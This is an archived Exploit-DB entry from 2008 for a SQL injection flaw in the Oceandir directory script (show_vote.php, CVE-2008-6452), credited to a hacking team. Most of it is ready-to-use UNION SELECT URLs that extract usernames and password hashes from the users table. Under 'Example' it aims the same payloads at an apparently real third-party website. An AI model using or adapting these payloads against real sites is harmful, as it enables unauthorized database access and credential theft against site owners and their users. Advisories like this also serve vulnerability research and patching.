Oceandir <= 2.9 show_vote.php id Remote SQL Injection Vulnerability

2008-09-20T00:00:00
ID EDB-ID:6504
Type exploitdb
Reporter JEEN HACKER TEAM
Modified 2008-09-20T00:00:00

Description

Oceandir <= 2.9 (show_vote.php id) Remote SQL Injection Vulnerability. CVE-2008-6452. Webapps exploit for php platform

                                        
                                            /**
 * @title Oceandir &lt;= 2.9 (show_vote.php id) Remote SQL injection
 * @author JEEN HACKER TEAM [ Jeen + Secertry ]
 * @cost 250$ 
 * @script http://www.oceandir.com
 * @copyright 2008
 * @homepage http://www.hackteach.org/cc/teach.php
 * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM
 */

Exploit :
~user
http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
~passwd
http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users

Example :
####
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
####

Greetz : www.hackteach.org user's

# milw0rm.com [2008-09-20]